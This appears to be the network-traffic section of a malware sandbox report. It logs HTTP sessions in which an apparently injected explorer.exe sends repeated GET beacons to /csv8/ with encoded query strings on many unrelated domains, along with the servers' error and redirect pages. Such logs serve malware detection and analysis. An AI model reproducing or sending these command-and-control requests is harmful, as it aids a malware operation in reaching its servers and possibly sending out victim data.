                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                              Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              21192.168.2.349779103.20.127.6180C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:56:05.644100904 CET5166OUTGET /csv8/?EZUXxJ=JcDbJrKBTdSh2qrV/QHXhZH9/vCGpAjnUxGYv0DqxJ8xNpceyS+NtrlgJ2Ns4M+VWFGw&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.starrockindia.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:56:05.883029938 CET5167INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Wed, 13 Jan 2021 19:56:05 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 110148
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              X-Powered-By: Express
                                                                              Cache-Control: no-cache, no-store, must-revalidate, no-transform
                                                                              Pragma: no-cache
                                                                              Expires: 0
                                                                              Set-Cookie: isOffersHeaderHidden=; Domain=.www.starrockindia.com; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT
                                                                              Set-Cookie: webtype=undefined; Max-Age=1610567852; Domain=.www.starrockindia.com; Path=/; Expires=Wed, 27 Jan 2072 15:53:37 GMT
                                                                              Set-Cookie: googtrans=/en/en; Max-Age=31536; Domain=.www.starrockindia.com; Path=/; Expires=Thu, 14 Jan 2021 04:41:41 GMT
                                                                              Set-Cookie: googtrans=/en/en; Max-Age=31536; Domain=www.starrockindia.com; Path=/; Expires=Thu, 14 Jan 2021 04:41:41 GMT
                                                                              Set-Cookie: googtrans=/en/en; Max-Age=31536; Domain=.starrockindia.com; Path=/; Expires=Thu, 14 Jan 2021 04:41:41 GMT
                                                                              Set-Cookie: NSSESSION=s%3AkYNJHi9TKDF1hl07gkT9ViNwTELyw_oP.U%2BuL4J3zkdi9tpLC%2FCyo4bJH3O6%2FafmGVDUnO8oo384; Path=/; Expires=Thu, 13 Jan 2022 19:56:05 GMT; HttpOnly
                                                                              ETag: W/"1ae44-rmb2xT3Uj1TxpmHXEtC/Hq4i2PA"
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 64 65 73 6b 74 6f 70 20 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 59 59 33 4f 67 75 55 6e 7a 4b 6e 77 43 72 56 44 32 39 45 31 71 66 4a 6f 6d 50 46 37 5f 70 46 52 51 66 44 55 6d 70 5a 2d 36 42 77 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d
                                                                              Data Ascii: <!DOCTYPE html><html class="no-js desktop " lang="en"><head><meta name="google-site-verification" content="YY3OguUnzKnwCrVD29E1qfJomPF7_pFRQfDUmpZ-6Bw"/><meta http-equiv="Content-Type" content="text/html; charset=UTF-


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              3192.168.2.3497472.57.90.1680C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:53:47.117913008 CET4151OUTGET /csv8/?EZUXxJ=wz9bsKZezgylXE2xySv04yz/UXtzAnP44BanueQcObrBh8vQr+0W6/ezJrtA4EzaB/eD&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.bhoomimart.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:53:47.178179026 CET4153INHTTP/1.1 404 Not Found
                                                                              Date: Wed, 13 Jan 2021 19:53:47 GMT
                                                                              Server: Apache
                                                                              Last-Modified: Tue, 15 Dec 2020 20:29:50 GMT
                                                                              ETag: "28ad-5b6869edbafe1"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 10413
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-Content-Type-Options: nosniff
                                                                              Cache-Control: max-age=63072000, public
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 34 2e 37 2e 30 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 61 6d 70 3b 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b
                                                                              Data Ascii: <!DOCTYPE html><html><head> <title>Parked Domain name on Hostinger DNS system</title> <meta charset="utf-8"> <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible"> <meta content="Parked Domain name on Hostinger DNS system" name="description"> <meta content="width=device-width, initial-scale=1" name="viewport"> <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&amp;subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel="stylesheet"> <style> body {


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              4192.168.2.34974845.38.251.20480C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:53:52.455785990 CET4164OUTGET /csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.yyyut6.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:53:52.650135994 CET4165INHTTP/1.1 404 Not Found
                                                                              Content-Length: 1308
                                                                              Content-Type: text/html
                                                                              Server: Microsoft-IIS/6.0
                                                                              Date: Wed, 13 Jan 2021 19:53:41 GMT
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e ce de b7 a8 d5 d2 b5 bd b8 c3 d2 b3 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 47 42 32 33 31 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 cb ce cc e5 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e ce de b7 a8 d5 d2 b5 bd b8 c3 d2 b3 3c 2f 68 31 3e 0d 0a c4 fa d5 fd d4 da cb d1 cb f7 b5 c4 d2 b3 c3 e6 bf c9 c4 dc d2 d1 be ad c9 be b3 fd a1 a2 b8 fc c3 fb bb f2 d4 dd ca b1 b2 bb bf c9 d3 c3 a1 a3 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e c7 eb b3 a2 ca d4 d2 d4 cf c2 b2 d9 d7 f7 a3 ba 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e c8 b7 b1 a3 e4 af c0 c0 c6 f7 b5 c4 b5 d8 d6 b7 c0 b8 d6 d0 cf d4 ca be b5 c4 cd f8 d5 be b5 d8 d6 b7 b5 c4 c6 b4 d0 b4 ba cd b8 f1 ca bd d5 fd c8 b7 ce de ce f3 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e c8 e7 b9 fb cd a8 b9 fd b5 a5 bb f7 c1 b4 bd d3 b6 f8 b5 bd b4 ef c1 cb b8 c3 cd f8 d2 b3 a3 ac c7 eb d3 eb cd f8 d5 be b9 dc c0 ed d4 b1 c1 aa cf b5 a3 ac cd a8 d6 aa cb fb c3 c7 b8 c3 c1 b4 bd d3 b5 c4 b8 f1 ca bd b2 bb d5 fd c8 b7 a1 a3 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e b5 a5 bb f7 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e ba f3 cd cb 3c 2f 61 3e b0 b4 c5 a5 b3 a2 ca d4 c1 ed d2 bb b8 f6 c1 b4 bd d3 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 b4 ed ce f3 20 34 30 34 20 2d 20 ce c4 bc fe bb f2 c4 bf c2 bc ce b4 d5 d2 b5 bd a1 a3 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 d0 c5 cf a2 b7 fe ce f1 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e bc bc ca f5 d0 c5 cf a2 a3 a8 ce aa bc bc ca f5 d6 a7 b3 d6 c8 cb d4 b1 cc e1 b9 a9 a3 a9 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e d7 aa b5 bd 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 6c 69 6e 6b 69 64 3d 38 31 38 30 22 3e 4d 69 63 72 6f 73 6f 66 74 20 b2 fa c6 b7 d6 a7 b3 d6 b7 fe ce f1 3c 2f 61 3e b2 a2 cb d1 cb f7 b0 fc c0 a8 26 6c 64 71 75 6f 3b 48 54 54 50 26 72 64 71 75 6f 3b ba cd 26 6c 64 71 75 6f 3b 34 30 34 26 72 64 71 75 6f 3b b5 c4 b1 ea cc e2 a1 a3 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e b4 f2 bf aa 26 6c 64 71 75 6f 3b 49 49 53 20 b0 ef d6 fa 26 72 64 71 75 6f 3b a3 a8 bf c9 d4 da 20 49 49 53 20 b9 dc c0 ed c6 f7 20 28 69 6e 65 74 6d 67 72 29 20 d6 d0 b7 c3 ce ca a3 a9 a3 ac c8 bb ba f3 cb d1 cb f7 b1 ea cc e2 ce aa 26 6c 64 71 75 6f 3b cd f8 d5 be c9 e8 d6 c3 26
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE></TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312"><STYLE type="text/css"> BODY { font: 9pt/12pt } H1 { font: 12pt/15pt } H2 { font: 9pt/12pt } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1></h1><hr><p></p><ul><li></li><li></li><li><a href="javascript:history.back(1)"></a></li></ul><h2>HTTP 404 - <br>Internet (IIS)</h2><hr><p></p><ul><li> <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft </a>&ldquo;HTTP&rdquo;&ldquo;404&rdquo;</li><li>&ldquo;IIS &rdquo; IIS (inetmgr) &ldquo;&


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              5192.168.2.34974923.105.124.22580C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:53:58.221945047 CET4166OUTGET /csv8/?EZUXxJ=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.alparmuhendislik.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              6192.168.2.34975345.88.202.11580C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:54:09.374722958 CET4193OUTGET /csv8/?EZUXxJ=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODxivVfv92N&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.globepublishers.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:54:09.427134991 CET4194INHTTP/1.1 301 Moved Permanently
                                                                              Server: nginx
                                                                              Date: Wed, 13 Jan 2021 19:54:09 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 162
                                                                              Connection: close
                                                                              Location: https://www.globepublishers.com/csv8/?EZUXxJ=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODxivVfv92N&DzrLH=VBZHYDrxndGXyf
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              7192.168.2.349754216.10.246.13180C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:54:15.019397020 CET4195OUTGET /csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.thedigitalsatyam.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:54:16.232908964 CET4195INHTTP/1.1 301 Moved Permanently
                                                                              Date: Wed, 13 Jan 2021 19:54:15 GMT
                                                                              Server: Apache
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              X-Redirect-By: WordPress
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Location: http://thedigitalsatyam.com/csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf
                                                                              Content-Length: 0
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              8192.168.2.349755198.185.159.14480C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jan 13, 2021 20:54:27.873606920 CET4197OUTGET /csv8/?EZUXxJ=0hV2NfdVjmx+yfQvTLszaaA4nyOLrpeuP9TqtJZz9egJMD1sBqTfWGO8dwDzLIh3ahLd&DzrLH=VBZHYDrxndGXyf HTTP/1.1
                                                                              Host: www.scheherazadelegault.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Jan 13, 2021 20:54:28.035471916 CET4198INHTTP/1.1 400 Bad Request
                                                                              Cache-Control: no-cache, must-revalidate
                                                                              Content-Length: 77564
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 13 Jan 2021 19:54:27 UTC
                                                                              Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                              Pragma: no-cache
                                                                              Server: Squarespace
                                                                              X-Contextid: hiqBt4LJ/aCSqzNXo
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 